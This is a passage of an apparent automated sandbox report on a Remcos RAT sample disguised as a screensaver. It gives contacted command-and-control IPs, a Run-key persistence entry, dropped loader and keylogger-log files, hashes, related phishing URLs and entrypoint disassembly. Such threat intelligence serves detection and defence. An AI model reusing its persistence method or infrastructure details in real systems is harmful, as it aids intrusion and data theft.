https://onedrive.live.com/downlo	Jsqwmpul.PIF, 0000000C.00000002.2281075353.000000002C5ED000.00000004.00001000.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.ebuddy.com	SndVol.exe, 00000003.00000002.4419868717.000000001E690000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000008.00000002.2032938486.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.139.11	dual-spov-0006.spov-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
107.175.229.139	unknown	United States	36352	AS-COLOCROSSINGUS	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1441701
Start date and time:	2024-05-15 01:56:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	HGTQP09643009.scr.exe
Detection:	MAL
Classification:	mal100.rans.phis.troj.spyw.expl.evad.winEXE@21/6@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 89 Number of non-executed functions: 261
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.42.12
Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, odc-am-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, am-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-am-files-brs.onedrive.akadns.net, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:56:46	API Interceptor	1x Sleep call for process: HGTQP09643009.scr.exe modified
01:56:54	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Jsqwmpul C:\Users\Public\Jsqwmpul.url
01:57:03	API Interceptor	2x Sleep call for process: Jsqwmpul.PIF modified
01:57:03	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Jsqwmpul C:\Users\Public\Jsqwmpul.url
01:57:25	API Interceptor	6617169x Sleep call for process: SndVol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.107.139.11	Customer Ref-340000723012366.cmd	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse
	PNX-SOA-0452-01073-2024.13.05-04-15-113108087979.cmd	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse
	Statement of Account March & April.cmd	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse
	4333.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	remcos.exe	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse
	https://1drv.ms/u/s!AvRvEmgJ5d9kgly3z-uh2_ANgH5h	Get hash	malicious	Unknown	Browse
	https://1drv.ms/u/s!AvRvEmgJ5d9kgly3z-uh2_ANgH5h	Get hash	malicious	Unknown	Browse
	htm.exe	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse
	y0w04xGM45.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	Se7CZnlXZZ.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse
107.175.229.139	z49factura098765679000.bat.exe	Get hash	malicious	Remcos, PrivateLoader	Browse
	#U00dcberpr#U00fcfen Sie Ihre_INV-2087_A97OPY7R#4DE688II65-DHL.scr.exe	Get hash	malicious	Remcos, PrivateLoader	Browse
	z97FDREMCO00000HJ.bat.exe	Get hash	malicious	Remcos, PrivateLoader	Browse
	VNNctWOjel.exe	Get hash	malicious	Remcos	Browse
	0876543456700076.xlam.xlsx	Get hash	malicious	Remcos, DBatLoader	Browse
	uBsTFchGsf.exe	Get hash	malicious	Remcos	Browse
	Orden de compra 0001-0025545T.exe	Get hash	malicious	Remcos	Browse
	SDA09876789000090.exe	Get hash	malicious	Remcos	Browse
	FTQ07789000900.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Orden de compra 0001-00255454.exe	Get hash	malicious	DBatLoader, Remcos	Browse
178.237.33.50	Shipping Document.P.df.exe	Get hash	malicious	PrivateLoader, Remcos	Browse	geoplugin.net/json.gp
	RFQ_83747384738757384754837483.xls	Get hash	malicious	Remcos, PrivateLoader	Browse	geoplugin.net/json.gp
	FOTO MULTA NACIONAL.vbs	Get hash	malicious	Remcos, PrivateLoader	Browse	geoplugin.net/json.gp
	Customer Ref-340000723012366.cmd	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	geoplugin.net/json.gp
	PNX-SOA-0452-01073-2024.13.05-04-15-113108087979.cmd	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	geoplugin.net/json.gp
	BenefitsRequest#241305.com.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	0093222024135.exe	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	2024_002930_24270100IM00003824_onyuz.exe	Get hash	malicious	GuLoader, Remcos	Browse	geoplugin.net/json.gp
	remcos.exe	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	geoplugin.net/json.gp
	remcos.exe	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	geoplugin.net/json.gp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dual-spov-0006.spov-msedge.net	Customer Ref-340000723012366.cmd	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	13.107.139.11
	PNX-SOA-0452-01073-2024.13.05-04-15-113108087979.cmd	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	13.107.139.11
	Statement of Account March & April.cmd	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	13.107.139.11
	4333.exe	Get hash	malicious	DBatLoader, FormBook	Browse	13.107.139.11
	RFQ(PO1,2AN3)002088UTH-PDF.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	13.107.137.11
	remcos.exe	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	13.107.139.11
	remcos.exe	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	13.107.137.11
	remcos.exe	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	13.107.137.11
	Purchase Order.exe	Get hash	malicious	GuLoader, Remcos	Browse	13.107.137.11
	Purchase Order is approved20240509.cmd	Get hash	malicious	DBatLoader	Browse	13.107.137.11
geoplugin.net	Shipping Document.P.df.exe	Get hash	malicious	PrivateLoader, Remcos	Browse	178.237.33.50
	RFQ_83747384738757384754837483.xls	Get hash	malicious	Remcos, PrivateLoader	Browse	178.237.33.50
	FOTO MULTA NACIONAL.vbs	Get hash	malicious	Remcos, PrivateLoader	Browse	178.237.33.50
	Customer Ref-340000723012366.cmd	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	178.237.33.50
	PNX-SOA-0452-01073-2024.13.05-04-15-113108087979.cmd	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	178.237.33.50
	BenefitsRequest#241305.com.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	0093222024135.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	2024_002930_24270100IM00003824_onyuz.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	remcos.exe	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	178.237.33.50
	remcos.exe	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	aowNKqhrAX.elf	Get hash	malicious	Mirai	Browse	172.111.241.98
	25094.xls	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.3.239.30
	Pepsico LLC Company Profile.xls	Get hash	malicious	GuLoader	Browse	192.3.64.142
	Shipping Document.P.df.exe	Get hash	malicious	PrivateLoader, Remcos	Browse	107.173.4.18
	Swift_202411054785712.xlam.xlsx	Get hash	malicious	Unknown	Browse	23.94.54.101
	Sales Agreement.xlam.xlsx	Get hash	malicious	Unknown	Browse	198.23.188.141
	RFQ_83747384738757384754837483.xls	Get hash	malicious	Remcos, PrivateLoader	Browse	107.173.4.16
	TT Copy 103.xls	Get hash	malicious	Unknown	Browse	192.3.239.4
	TT Copy 103.xls	Get hash	malicious	Unknown	Browse	192.3.239.4
	RFQ 1305.2024.xls	Get hash	malicious	Unknown	Browse	172.245.123.8
ATOM86-ASATOM86NL	Shipping Document.P.df.exe	Get hash	malicious	PrivateLoader, Remcos	Browse	178.237.33.50
	RFQ_83747384738757384754837483.xls	Get hash	malicious	Remcos, PrivateLoader	Browse	178.237.33.50
	FOTO MULTA NACIONAL.vbs	Get hash	malicious	Remcos, PrivateLoader	Browse	178.237.33.50
	Customer Ref-340000723012366.cmd	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	178.237.33.50
	PNX-SOA-0452-01073-2024.13.05-04-15-113108087979.cmd	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	178.237.33.50
	BenefitsRequest#241305.com.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	0093222024135.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	2024_002930_24270100IM00003824_onyuz.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	remcos.exe	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	178.237.33.50
	remcos.exe	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse	178.237.33.50
MICROSOFT-CORP-MSN-AS-BLOCKUS	messages undelivered.htm_	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	https://sharepoint-0a17.dideto2686.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	https://preapi.tusegurocontodo.pe/	Get hash	malicious	Unknown	Browse	13.107.213.57
	https://pstscsecforesnec.centralindia.cloudapp.azure.com/?ID407064992940875410	Get hash	malicious	HTMLPhisher	Browse	20.244.83.166
	https://public-usa.mkt.dynamics.com/api/orgs/625487fa-5d11-ef11-9f83-0022480af135/r/BMfzuh0WNUqT1TFe57jpOgAAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fclick.pstmrk.it%252F3s%252Ft.co%25252FNOcg8n1tnP%252FOwPK%252FmEu1AQ%252FAQ%252Faa7c1e48-00af-427f-a250-c2384a3aafff%252F1%252F0_nAxhax6e%2523_msdynmkt_donottrack%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%220%22%3Anull%7D%7D&digest=vcUl1BUbojOM1LRcdyw7%2FubPzi2KQv%2F0N9i6YbnPbR0%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee	Get hash	malicious	HTMLPhisher	Browse	52.146.76.30
	https://www.shareholds.com/nam/015d9635-3549-4592-98af-02a619f71501/d5a41b7a-ee6a-4aa3-a0f4-2b17f43ec8fd/3d4ec201-d05d-471e-bafe-1176cd109982/login?id=L1p4RHV2WFRud3hwazc1M0tnSkVsN2IwM3E5VGFTVWw0bTBxemszMWswbDFEZ3A2NWFrNFpHRytqZnBXeXZUOGNpNFcrM21BVE5HdG9Tb0V0VmlLcXpZbXJsVEMyenRKK3ZKUVNReXNPQmIvbGNneStIT1h2UlhpeEJmZmpZTFFtVTRXRHNCRUYxR1AyTmhXcEJjUkNBWTcrSTVHTkVnMnhBNzNVNHhjUkNBcmtvZ3pKM1dWbW1wWTZwalJ2ZUtTQi96K21ENGhwYWZlcnE2amJiVk1SdjJEcXA2VnpyZW1saDVpQjRuUStuKzB5M2pnSnllb3k1cks4SlZkOWFacUw5dVd6U2xGZktRUmZoWkU3KzljdHBKUFB6Y1lKMkZiNnhBblQvU1hDVDU4SUhaOUdCVEtGMFVSdXR2VklhU3VQRDRJb0hsdGxMUG80Z1RCdDQ3WGs0N0h6d3UzTHJ6TzJ1cE5leFRucjhCMHVLa3VWTVF4cjQyQXFvc0gzSStsYVNCQko3bm9xWjl1RVdIZWRPN2hCdz09	Get hash	malicious	Unknown	Browse	13.107.246.71
	https://url2.mailanyone.net/scanner?d=4%7Cmail%2F90%2F1715596200%2F1s6T2F-0006Jp-4D%7Cin2m%7C57e1b682%7C17902772%7C12174482%7C6641ED0F70EB93309D580AF5B4F3AA64&m=1s6T2F-0006Jp-4D&o=%2Fpht1%3A%2Fwtslc-xartc.o2cre2m%2F0.o_54-11300-h--0m9.t50otl%3Fr_suum-acelrop%3Deibcyvehi.emm.cmut_o%26eueds%3Dnwimutlemr%26ttegm_c%3Dainaptsop-wen&s=IqM1Zc5GwuLm8yWijEEnkbPBHbw	Get hash	malicious	HTMLPhisher	Browse	13.107.213.71
	https://conta.cc/3JXNZaS	Get hash	malicious	Unknown	Browse	13.107.213.71
	https://url2.mailanyone.net/scanner?m=1s6pTH-0000Fr-6D&d=4%7Cmail%2F90%2F1715682600%2F1s6pTH-0000Fr-6D%7Cin2f%7C57e1b682%7C28613012%7C14303582%7C66433DF3D46FD0B9149B37AF26642EB9&o=%2Fphtu%3A%2Fptsacblmus.i-mdktcnai.ypos.%2F%2Faicm5sor35feg%2Fa-5ce90-285-f10f8-1963002105dab%2Fc%2FQn7UrkNU_s_0P8LqAhGaAAIAeQtaA%3F%25ge%3Dtrr27BeTag%252%25ltUA223r%25sh%2522tp%252tF%2553252%25A2ap52eopnFrbnmoleduudmsle2co%25t.2w522%252%25Fpi2C%25eedr2Rnpct%25iosOtB3222%257%25%25AA225u%253n%25222ll%25%2521%25Cl322%25nul%25Ai77De%26dg%25DwQst2aF%25%3Db6fBkf2LXU3hwBIL4xHiGTWDIqObb0zE5ov3Ct%25VGteD%26ereVsc5ors7%3Da8indb59bd247b4ba3633fb4ee51eb8d&s=9OHmoQ0JkwbsHuMKJ_DcFrbob0A	Get hash	malicious	Unknown	Browse	52.146.76.30
	https://sgpbioenergy-my.sharepoint.com/:u:/p/rdelbert/EYPL7JCPKcZHjisE2fncQt4BU_-rrhk008-dZ7fJDaA1Sg?xsdata=MDV8MDJ8bWljaGFlbC5tYXJ0dWNjaUBnbG9iYWxmb3VuZHJpZXMuY29tfDg0NTI0ZWEwZjQ3OTRlYTc2Nzg2MDhkYzc0MWZiOGY4fDAzOWY2ZDQ5NDNiYjRhNTNiMjk5NGZhMGM3ZmMyMjc2fDF8MHw2Mzg1MTI5MjcyMzE0NTU3NTZ8VW5rbm93bnxUV0ZwYkdac2IzZDhleUpXSWpvaU1DNHdMakF3TURBaUxDSlFJam9pVjJsdU16SWlMQ0pCVGlJNklrMWhhV3dpTENKWFZDSTZNbjA9fDQwMDAwfHx8&sdata=UXRWVUtMbmtxbG41Z1IzaTdLZTFzajRmL0crazN5YkdFNndwcmp3blF5UT0%3d	Get hash	malicious	Unknown	Browse	13.107.136.10

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	SecuriteInfo.com.Win32.SpywareX-gen.6594.13084.exe	Get hash	malicious	LummaC	Browse	13.107.139.11
	BankPaymAdviceVend.Report.docx	Get hash	malicious	Unknown	Browse	13.107.139.11
	6YGziTTmDp.msi	Get hash	malicious	PrivateLoader, VMdetect	Browse	13.107.139.11
	MUlklsWPpT.msi	Get hash	malicious	PrivateLoader, VMdetect	Browse	13.107.139.11
	Swift_202411054785712.xlam.xlsx	Get hash	malicious	Unknown	Browse	13.107.139.11
	Sales Agreement.xlam.xlsx	Get hash	malicious	Unknown	Browse	13.107.139.11
	TT Copy 103.xls	Get hash	malicious	Unknown	Browse	13.107.139.11
	PO-20240510.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.139.11
	RFQ 1305.2024.xls	Get hash	malicious	Unknown	Browse	13.107.139.11
	Setup.exe	Get hash	malicious	LummaC	Browse	13.107.139.11

Process:	C:\Windows\SysWOW64\SndVol.exe
File Type:	data
Category:	dropped
Size (bytes):	390
Entropy (8bit):	3.40380415482186
Encrypted:	false
SSDEEP:	6:6lx25YcIeeDAl2i63141gWAVl+Sk897+SGPWAGfE/OSFWAv:6lcec8/3FWQwoKtPWa/OSFW+
MD5:	A6F96A93396CABC5227503BABE425936
SHA1:	66C30D4BB88E99E0CD4C76B25E7890C10269CCF1
SHA-256:	DDA674E815D8674712AD0D97A2067D8ADEF996FCD60D669EA815CF4F9014D3ED
SHA-512:	6FE586F108CAC1DF62E023CAFECE783167296921C6F9BD7ACC5308846E4922B08C07260C009956CA4FEA407478F9C05001B4055A1D750DF94B3E86B0E6C8B2F7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation:	low
Preview:	....[.2.0.2.4./.0.5./.1.5. .0.1.:.5.6.:.5.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.V.o.l.u.m.e. .M.i.x.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.W.i.n.d.o.w.s. .V.o.l.u.m.e. .A.p.p. .W.i.n.d.o.w.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\Public\Jsqwmpul.url

Download File

Process:	C:\Users\user\Desktop\HGTQP09643009.scr.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Jsqwmpul.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	5.117404160633784
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMq4Ssb9Z1K9u:HRYFVmTWDyzpE9+9u
MD5:	BBC6DF08BD677692AB53CC8C852EC3A6
SHA1:	30160B114BBA37AD1FF39A3D22A911C88A249D07
SHA-256:	F8F748EB96280920BCA6A84291A701C30AAEFE5EF65A07B3A940694A0B79413C
SHA-512:	B30FD38145E09C8A3C0C81C03836F6450D03C4BA01FE914B5CA89E6BEAC7ADD0B14CC4DC97512DE5520903735DBE8FA15CFA31208F06F9B67BC749173BBEE325
Malicious:	true
Reputation:	low
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Jsqwmpul.PIF"..IconIndex=59..HotKey=33..

C:\Users\Public\Libraries\Jsqwmpul.PIF

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1103360
Entropy (8bit):	6.195563708800626
Encrypted:	false
SSDEEP:	24576:CA0ReRHP4+ngiPzZPQgBt9o/1bIhTmOLm:CUd+gBWbIhaOK
MD5:	C8B0899DD51C7516316ED413771E71C4
SHA1:	E9E407A9A7F7655940B1A7B48AC02B740D004004
SHA-256:	841200C9E115B489ADB33D27E4FCD1F6769609E5C378A45EF1D371200BD9A41C
SHA-512:	B2EB32CAB1CFF714502B20D7BAA1297A55D9107A683260E799FEC99A485758D039989407D169A5843CC3ABA65F9D0C9B737BD33BE35DFFD266B8DAFF0CF8B0D8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61% Antivirus: Virustotal, Detection: 60%, Browse
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................N...................@..........................p...................@...............................$...`..........................,c..................................................................................text....E.......F.................. ..`.itext..0<...`...>...J.............. ..`.data..............................@....bss.....6...`.......H...................idata...$.......&...H..............@....tls....4............n...................rdata...............n..............@..@.reloc..,c.......d...p..............@..B.rsrc........`......................@..@.............p......................@..@................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

Download File

Process:	C:\Windows\SysWOW64\SndVol.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	958
Entropy (8bit):	5.0050251642019985
Encrypted:	false
SSDEEP:	12:tklU+nd6CsGkMyGWKyGXPVGArwY3TogmayHnmGcArpv/mOAaNO+ao9W7iN5zzkwS:ql1dRNuKyGX85JvXhNlT3/7SxDWro
MD5:	9EF6453C92B223F1C95FDADE1CAC068E
SHA1:	D2207DB852F363214C84E3EA3614916B401A16C3
SHA-256:	DE8F614AB297124D15A5575F01625D0012870A8D01EBB07C6BF14CB11A28D6D0
SHA-512:	5BAC6658E9608E3B69B5980447548D87F2C0639D2F20A24A3C342F2403B89417BBF5D9F085AEF6D24429B397FA0780721584A60510D77803E03D2B4124274F4E
Malicious:	false
Preview:	{. "geoplugin_request":"84.17.40.102",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Miami",. "geoplugin_region":"Florida",. "geoplugin_regionCode":"FL",. "geoplugin_regionName":"Florida",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"528",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"25.7689",. "geoplugin_longitude":"-80.1946",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Temp\bhv3259.tmp

Download File

Process:	C:\Windows\SysWOW64\SndVol.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xbe5945cb, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	17301504
Entropy (8bit):	0.8011984777830636
Encrypted:	false
SSDEEP:	6144:ydfjZb5aXEY2waXEY24URlMe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ+z:AVS4e81ySaKKjLrONseWe
MD5:	8E4478CDED0B4536038EE91DA4F0F04E
SHA1:	6788B3974B64B70609E8C78640FDD4C018F9C42C
SHA-256:	6C46A7D0369844731CDCFD7414585D5463C45ECD88ED6A5316C347D506C9C041
SHA-512:	975856F2B892F06AB39D6FB9CCF12DCB9089837B20F7A09BF9C54E544A25CC67E810AAC1B10E718A4E4705B30C7BECA13AB60682B2D9946CB6365EEF646422D9
Malicious:	false
Preview:	.YE.... .......;!......E{ow("...{........................@.....,....{..$8...\|..h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{]..................................o..$8...\|..................%...$8...\|...........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xkjscr

Download File

Process:	C:\Windows\SysWOW64\SndVol.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.195563708800626
TrID:	Win32 Executable (generic) a (10002005/4) 99.81% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	HGTQP09643009.scr.exe
File size:	1'103'360 bytes
MD5:	c8b0899dd51c7516316ed413771e71c4
SHA1:	e9e407a9a7f7655940b1a7b48ac02b740d004004
SHA256:	841200c9e115b489adb33d27e4fcd1f6769609e5c378a45ef1d371200bd9a41c
SHA512:	b2eb32cab1cff714502b20d7baa1297a55d9107a683260e799fec99a485758d039989407d169a5843cc3aba65f9d0c9b737bd33be35dffd266b8daff0cf8b0d8
SSDEEP:	24576:CA0ReRHP4+ngiPzZPQgBt9o/1bIhTmOLm:CUd+gBWbIhaOK
TLSH:	01356C8376A044A1D5A3193C540D4F8E6E5C7E59A604A9FF53E97CBCAB38BC2D0BC05B
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	1872d8c4dcdccedc

Static PE Info

General

Entrypoint:	0x459be8
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	439f1eee1816d6c8dbeb810c2f569ded

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00455390h
call 00007EFC30FD3215h
mov eax, dword ptr [004F5D60h]
mov eax, dword ptr [eax]
call 00007EFC3101EAC9h
mov ecx, dword ptr [004F5E50h]
mov eax, dword ptr [004F5D60h]
mov eax, dword ptr [eax]
mov edx, dword ptr [00455188h]
call 00007EFC3101EAC9h
mov eax, dword ptr [004F5D60h]
mov eax, dword ptr [eax]
call 00007EFC3101EB3Dh
call 00007EFC30FD1290h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfa000	0x24c2	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x106000	0x10200	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xff000	0x632c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xfe000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
